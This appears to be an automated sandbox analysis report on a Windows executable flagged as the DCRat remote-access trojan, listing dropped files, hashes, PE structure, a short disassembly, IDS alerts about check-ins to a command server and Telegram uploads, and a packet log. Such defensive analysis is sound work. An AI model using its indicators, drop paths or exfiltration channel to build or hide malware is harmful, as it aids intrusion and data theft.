                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                            Malicious:false
                                                                                            Process:C:\Recovery\Idle.exe
                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                            Category:dropped
                                                                                            Size (bytes):106496
                                                                                            Entropy (8bit):1.1358696453229276
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                            Malicious:false
                                                                                            Process:C:\Recovery\Idle.exe
                                                                                            File Type:JSON data
                                                                                            Category:dropped
                                                                                            Size (bytes):14
                                                                                            Entropy (8bit):3.378783493486176
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Y2Qt6eYYn:Y2Qt6eYYn
                                                                                            MD5:6CA4960355E4951C72AA5F6364E459D5
                                                                                            SHA1:2FD90B4EC32804DFF7A41B6E63C8B0A40B592113
                                                                                            SHA-256:88301F0B7E96132A2699A8BCE47D120855C7F0A37054540019E3204D6BCBABA3
                                                                                            SHA-512:8544CD778717788B7484FAF2001F463320A357DB63CB72715C1395EF19D32EEC4278BAB07F15DE3F4FED6AF7E4F96C41908A0C45BE94D5CDD8121877ECCF310D
                                                                                            Malicious:false
                                                                                            Preview:{"Surveys":{}}
                                                                                            Process:C:\Recovery\Idle.exe
                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                            Category:dropped
                                                                                            Size (bytes):20480
                                                                                            Entropy (8bit):0.5707520969659783
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                            Malicious:false
                                                                                            Process:C:\Recovery\Idle.exe
                                                                                            File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                            Category:dropped
                                                                                            Size (bytes):5242880
                                                                                            Entropy (8bit):0.037963276276857943
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                            MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                            SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                            SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                            SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                            Malicious:false
                                                                                            Process:C:\Recovery\Idle.exe
                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                            Category:dropped
                                                                                            Size (bytes):20480
                                                                                            Entropy (8bit):0.5707520969659783
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                            Malicious:false
                                                                                            Process:C:\Recovery\Idle.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):25
                                                                                            Entropy (8bit):4.1834651896016455
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:LePJpclj:LEgj
                                                                                            MD5:0A9AD878523934C83A6DE91D667D0C76
                                                                                            SHA1:E94FBEB0DD41436812F111CD672FD25082AF7E14
                                                                                            SHA-256:1074C62A23B986E658C8909F77036240178C2838A25222306C5F8514068F85D7
                                                                                            SHA-512:1EADD4E52880516DFF818C5EFB8FFFD448813EF7C9991CB16232CF52C0FAFC888AB361E1693763BFD966601B85E70A9A0EE678872EF7400B63167048A18CF865
                                                                                            Malicious:false
                                                                                            Preview:SFGKKmbH8lPFfFcVHLgKxNhMA
                                                                                            Process:C:\ProgramData\ssh\System.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):1870848
                                                                                            Entropy (8bit):7.42964549457949
                                                                                            Encrypted:false
                                                                                            SSDEEP:49152:2Lx3+NdmphJ3TWOodBNw8vNRf1Im/aN0mX3xf:2+NdmphJ3TWOsfNvNN2myb
                                                                                            MD5:9E0F8EFD67ACC61E4CB3B213B22E21DD
                                                                                            SHA1:7A688B1DF27A1FFA8C6AFB8303DE96B2E09EF802
                                                                                            SHA-256:B3DD5C3207C91F7B1EEC4405A632B23EEB6691A5ED1733FC3C1DC0A9A5783CB6
                                                                                            SHA-512:8D362BC73ADC3B284F0408D94E04D16A96588B121ECCC8674E5F50ECEA3086EA81511D27706536BB22B741A4E9C030AC90A021BE5AF2FDC419603FA45D04E805
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 81%
                                                                                            Process:C:\ProgramData\ssh\System.exe
                                                                                            File Type:ASCII text, with very long lines (912), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):912
                                                                                            Entropy (8bit):5.913594587698791
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:s78QYUA4R+k8OIHJ/vYClmulw6GqTAzgOsAfF:s4jvSZ8zYslw6BlOs8
                                                                                            MD5:AB7665AFFCB5F3F16093D16A1A4C79F2
                                                                                            SHA1:C4CAC7F3D7688C38BFC0E0B2CD537903B5236AD1
                                                                                            SHA-256:92F38E9D1ED783EFB3F94F7B9A3E3010100853C5097A840502C082C60081FD47
                                                                                            SHA-512:EAB83B63E22EF072AD9E3D73A0FE0B02D6E668CD19C5EB779FC72AE251D6CE01F98050AF01B11D8664496A5240F775125AE83A50B77FD0C109459CD164B061DD
                                                                                            Malicious:false
                                                                                            Process:C:\ProgramData\ssh\System.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):122
                                                                                            Entropy (8bit):5.498080219517708
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:3VNzZQwoO8Fa4jYH6dP99XfWQjCy1ZDFwnN3DWxCuVxn:3VGTBYHgupyb5wR2FVxn
                                                                                            MD5:A64C69258FB9EAF7C36363A2EAC83416
                                                                                            SHA1:70D608D48FF5A6444E483602240E820236A4BC6A
                                                                                            SHA-256:B6EC695C8E5062F67A7E2A6B340E0731553B0883AADF613925CAAA996C67B8B2
                                                                                            SHA-512:E9C1469F827B0FFB8F115A07608AB4C0C985856DDF469D7EAAFF03E437A960B63184F3F59FBAA498EF511D2D274E4012939C1107AE255D5004ACE177007A03FA
                                                                                            Malicious:false
                                                                                            Preview:2Aa0OKhP8rEsKBaDr9kXAlU0DyxiYJxfcntGn23EEkd7kx1vSYE7lgGRqjxZX80z3jPgRTazGgTaHXPP6CQ9Ez36hcaDEdrFtoDBhVd88P1FMqJTTicUr1uEpT
                                                                                            Process:C:\ProgramData\ssh\System.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):1870848
                                                                                            Entropy (8bit):7.42964549457949
                                                                                            Encrypted:false
                                                                                            SSDEEP:49152:2Lx3+NdmphJ3TWOodBNw8vNRf1Im/aN0mX3xf:2+NdmphJ3TWOsfNvNN2myb
                                                                                            MD5:9E0F8EFD67ACC61E4CB3B213B22E21DD
                                                                                            SHA1:7A688B1DF27A1FFA8C6AFB8303DE96B2E09EF802
                                                                                            SHA-256:B3DD5C3207C91F7B1EEC4405A632B23EEB6691A5ED1733FC3C1DC0A9A5783CB6
                                                                                            SHA-512:8D362BC73ADC3B284F0408D94E04D16A96588B121ECCC8674E5F50ECEA3086EA81511D27706536BB22B741A4E9C030AC90A021BE5AF2FDC419603FA45D04E805
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 81%
                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Entropy (8bit):7.374785899002249
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                            • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                            File name:6uPVRnocVS.exe
                                                                                            File size:2'180'702 bytes
                                                                                            MD5:7a193e404a6285a41aba3019479d1749
                                                                                            SHA1:e977d421b247ace0c630d118f05938460664c3b8
                                                                                            SHA256:661b2c9879d7ae68512f820689f2198fdc2d71288ed0a6e747a0ae3f4a27f176
                                                                                            SHA512:a93f289943e29c2a34dde3c7e12ce22641afa868b11c541120b48610f22447fe8fd1b8e64436886ac73facaefc3c82dd658129e49ab65917bfd27fd10278cd1c
                                                                                            SSDEEP:49152:abA30qELx3+NdmphJ3TWOodBNw8vNRf1Im/aN0mX3xfz:abdZ+NdmphJ3TWOsfNvNN2mybJ
                                                                                            TLSH:91A5BE027E418911F0191233C2FF554847B9AC512AA6E32FBDB9376E69613E37D0DACB
                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'..
                                                                                            Icon Hash:963b2d2d3b2b863b
                                                                                            Entrypoint:0x41ec40
                                                                                            Entrypoint Section:.text
                                                                                            Digitally signed:false
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows gui
                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                            Time Stamp:0x5FC684D7 [Tue Dec 1 18:00:55 2020 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:5
                                                                                            OS Version Minor:1
                                                                                            File Version Major:5
                                                                                            File Version Minor:1
                                                                                            Subsystem Version Major:5
                                                                                            Subsystem Version Minor:1
                                                                                            Import Hash:fcf1390e9ce472c7270447fc5c61a0c1
                                                                                            Instruction
                                                                                            call 00007FFA3CD34EA9h
                                                                                            jmp 00007FFA3CD348BDh
                                                                                            cmp ecx, dword ptr [0043E668h]
                                                                                            jne 00007FFA3CD34A35h
                                                                                            ret
                                                                                            jmp 00007FFA3CD3502Eh
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            push ebp
                                                                                            mov ebp, esp
                                                                                            push esi
                                                                                            push dword ptr [ebp+08h]
                                                                                            mov esi, ecx
                                                                                            call 00007FFA3CD277C7h
                                                                                            mov dword ptr [esi], 00435580h
                                                                                            mov eax, esi
                                                                                            pop esi
                                                                                            pop ebp
                                                                                            retn 0004h
                                                                                            and dword ptr [ecx+04h], 00000000h
                                                                                            mov eax, ecx
                                                                                            and dword ptr [ecx+08h], 00000000h
                                                                                            mov dword ptr [ecx+04h], 00435588h
                                                                                            mov dword ptr [ecx], 00435580h
                                                                                            ret
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            lea eax, dword ptr [ecx+04h]
                                                                                            mov dword ptr [ecx], 00435568h
                                                                                            push eax
                                                                                            call 00007FFA3CD37BCDh
                                                                                            pop ecx
                                                                                            ret
                                                                                            push ebp
                                                                                            mov ebp, esp
                                                                                            sub esp, 0Ch
                                                                                            lea ecx, dword ptr [ebp-0Ch]
                                                                                            call 00007FFA3CD2775Eh
                                                                                            push 0043B704h
                                                                                            lea eax, dword ptr [ebp-0Ch]
                                                                                            push eax
                                                                                            call 00007FFA3CD372E2h
                                                                                            int3
                                                                                            push ebp
                                                                                            mov ebp, esp
                                                                                            sub esp, 0Ch
                                                                                            lea ecx, dword ptr [ebp-0Ch]
                                                                                            call 00007FFA3CD349D4h
                                                                                            push 0043B91Ch
                                                                                            lea eax, dword ptr [ebp-0Ch]
                                                                                            push eax
                                                                                            call 00007FFA3CD372C5h
                                                                                            int3
                                                                                            jmp 00007FFA3CD39313h
                                                                                            jmp dword ptr [00433260h]
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            push 00421EB0h
                                                                                            push dword ptr fs:[00000000h]
                                                                                            Programming Language:
                                                                                            • [ C ] VS2008 SP1 build 30729
                                                                                            • [IMP] VS2008 SP1 build 30729
                                                                                            • [C++] VS2015 UPD3.1 build 24215
                                                                                            • [EXP] VS2015 UPD3.1 build 24215
                                                                                            • [RES] VS2015 UPD3 build 24213
                                                                                            • [LNK] VS2015 UPD3.1 build 24215
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x3c820 | 0x34 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3c854 | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x63000 | 0xc368 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x70000 | 0x2268 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3aac0 | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x35508 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x33000 | 0x260 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x3bdc4 | 0x120 | .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x310ea | 0x31200 | c5bf61bbedb6ad471e9dc6266398e965 | False | 0.583959526081425 | data | 6.708075396341128 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x33000 | 0xa612 | 0xa800 | 7980b588d5b28128a2f3c36cabe2ce98 | False | 0.45284598214285715 | data | 5.221742709250668 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3e000 | 0x23728 | 0x1000 | 201530c9e56f172adf2473053298d48f | False | 0.36767578125 | data | 3.7088186669877685 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat | 0x62000 | 0x188 | 0x200 | c5d41d8f254f69e567595ab94266cfdc | False | 0.4453125 | data | 3.2982538067961342 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x63000 | 0xc368 | 0xc400 | 12a9ade67f13cd480395c446598fe865 | False | 0.6443319515306123 | data | 6.469107959368268 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x70000 | 0x2268 | 0x2400 | c7a942b723cb29d9c02f7c611b544b50 | False | 0.7681206597222222 | data | 6.5548620101740545 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
PNG | 0x635b4 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States | 1.0027729636048528
PNG | 0x640fc | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States | 0.9363390441839495
RT_ICON | 0x656a8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | | | 0.350140712945591
RT_ICON | 0x66750 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | | | 0.5452127659574468
RT_ICON | 0x66bb8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | | | 0.24107883817427386
RT_ICON | 0x69160 | 0x3eb3 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9905301850352003
RT_DIALOG | 0x6d014 | 0x286 | data | English | United States | 0.5092879256965944
RT_DIALOG | 0x6d29c | 0x13a | data | English | United States | 0.60828025477707
RT_DIALOG | 0x6d3d8 | 0xec | data | English | United States | 0.6991525423728814
RT_DIALOG | 0x6d4c4 | 0x12e | data | English | United States | 0.5927152317880795
RT_DIALOG | 0x6d5f4 | 0x338 | data | English | United States | 0.45145631067961167
RT_DIALOG | 0x6d92c | 0x252 | data | English | United States | 0.5757575757575758
RT_STRING | 0x6db80 | 0x1e2 | data | English | United States | 0.3900414937759336
RT_STRING | 0x6dd64 | 0x1cc | data | English | United States | 0.4282608695652174
RT_STRING | 0x6df30 | 0x1b8 | data | English | United States | 0.45681818181818185
RT_STRING | 0x6e0e8 | 0x146 | data | English | United States | 0.5153374233128835
RT_STRING | 0x6e230 | 0x446 | data | English | United States | 0.340036563071298
RT_STRING | 0x6e678 | 0x166 | data | English | United States | 0.49162011173184356
RT_STRING | 0x6e7e0 | 0x152 | data | English | United States | 0.5059171597633136
RT_STRING | 0x6e934 | 0x10a | data | English | United States | 0.49624060150375937
RT_STRING | 0x6ea40 | 0xbc | data | English | United States | 0.6329787234042553
RT_STRING | 0x6eafc | 0xd6 | data | English | United States | 0.5747663551401869
RT_GROUP_ICON | 0x6ebd4 | 0x3e | data | | | 0.8225806451612904
RT_MANIFEST | 0x6ec14 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.39786666666666665
DLL | Import
KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
gdiplus.dll | GdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-11T18:07:16.689498+0100 | 2034194 | ET MALWARE DCRAT Activity (GET) | 1 | 192.168.2.4 | 51288 | 5.101.152.15 | 80 | TCP
2025-01-11T18:07:20.259693+0100 | 1810009 | Joe Security ANOMALY Telegram Send Photo | 1 | 192.168.2.4 | 53641 | 149.154.167.220 | 443 | TCP
2025-01-11T18:07:52.644367+0100 | 2850862 | ETPRO MALWARE DCRat Initial Checkin Server Response M4 | 1 | 5.101.152.15 | 80 | 192.168.2.4 | 53647 | TCP
2025-01-11T18:09:12.682023+0100 | 2850862 | ETPRO MALWARE DCRat Initial Checkin Server Response M4 | 1 | 5.101.152.15 | 80 | 192.168.2.4 | 53928 | TCP
2025-01-11T18:10:39.213109+0100 | 2850862 | ETPRO MALWARE DCRat Initial Checkin Server Response M4 | 1 | 5.101.152.15 | 80 | 192.168.2.4 | 53943 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                            Jan 11, 2025 18:07:20.261061907 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.261147976 CET44353641149.154.167.220192.168.2.4
                                                                                            Jan 11, 2025 18:07:20.261864901 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.261904001 CET44353641149.154.167.220192.168.2.4
                                                                                            Jan 11, 2025 18:07:20.262068033 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.262300014 CET44353641149.154.167.220192.168.2.4
                                                                                            Jan 11, 2025 18:07:20.262440920 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.262470961 CET44353641149.154.167.220192.168.2.4
                                                                                            Jan 11, 2025 18:07:20.262499094 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.262521982 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.262522936 CET44353641149.154.167.220192.168.2.4
                                                                                            Jan 11, 2025 18:07:20.262545109 CET44353641149.154.167.220192.168.2.4
                                                                                            Jan 11, 2025 18:07:20.262569904 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.262593985 CET44353641149.154.167.220192.168.2.4
                                                                                            Jan 11, 2025 18:07:20.262646914 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.262670994 CET44353641149.154.167.220192.168.2.4
                                                                                            Jan 11, 2025 18:07:20.262697935 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.262722015 CET44353641149.154.167.220192.168.2.4
                                                                                            Jan 11, 2025 18:07:20.262729883 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.262748003 CET44353641149.154.167.220192.168.2.4
                                                                                            Jan 11, 2025 18:07:20.262790918 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.262805939 CET44353641149.154.167.220192.168.2.4
                                                                                            Jan 11, 2025 18:07:20.262839079 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.262857914 CET44353641149.154.167.220192.168.2.4
                                                                                            Jan 11, 2025 18:07:20.262875080 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.262888908 CET44353641149.154.167.220192.168.2.4
                                                                                            Jan 11, 2025 18:07:20.262914896 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.262949944 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.262998104 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.263024092 CET44353641149.154.167.220192.168.2.4
                                                                                            Jan 11, 2025 18:07:20.263030052 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.263058901 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.263073921 CET44353641149.154.167.220192.168.2.4
                                                                                            Jan 11, 2025 18:07:20.263084888 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.263103008 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.263179064 CET44353641149.154.167.220192.168.2.4
                                                                                            Jan 11, 2025 18:07:20.263187885 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.263223886 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.263252974 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.263290882 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.263343096 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.263375998 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.263380051 CET44353641149.154.167.220192.168.2.4
                                                                                            Jan 11, 2025 18:07:20.263411999 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.263427019 CET44353641149.154.167.220192.168.2.4
                                                                                            Jan 11, 2025 18:07:20.263448954 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.263474941 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.263504982 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.263540983 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.263556957 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.263601065 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.263601065 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.263649940 CET53641443192.168.2.4149.154.167.220
